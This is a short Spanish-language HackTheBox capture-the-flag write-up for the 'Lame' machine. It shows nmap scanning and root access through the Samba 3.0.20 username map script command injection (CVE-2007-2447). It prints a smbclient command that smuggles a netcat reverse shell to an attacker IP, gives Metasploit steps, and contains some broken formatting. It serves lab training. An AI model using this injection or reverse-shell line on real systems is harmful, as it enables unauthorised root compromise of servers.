write-ups / hackthebox / lame-htb
HackTheBoxeasyLinux
Lame — Samba CVE-2007-2447
Explotación de Samba 3.0.20 en Lame de HTB. Vulnerabilidad CVE-2007-2447 (username map script) para obtener root directamente.
14 de febrero de 20241 min read
HTBSambaCVE-2007-2447LinuxCommand Injection
Reconocimiento
bash
nmap -sV -sC -oN lame.nmap 10.10.10.3
Puertos: 21 (FTP vsftpd 2.3.4), 22 (SSH), 139/445 (Samba 3.0.20-Debian).
Enumeración FTP
vsftpd 2.3.4 tiene un backdoor conocido, pero en esta máquina no funciona.
Explotación Samba
Samba 3.0.20 es vulnerable a CVE-2007-2447 — command injection via :
bash
username map scriptbash
smbclient //10.10.10.3/tmp -U './=`nohup nc -e /bin/bash 10.10.14.5 4444`'
O con Metasploit:
bash
use exploit/multi/samba/usermap_script
set RHOSTS 10.10.10.3
set LHOST tun0
run
Shell directa como .
bash
rootFlags
bash
cat /home/makis/user.txt
cat /root/root.txt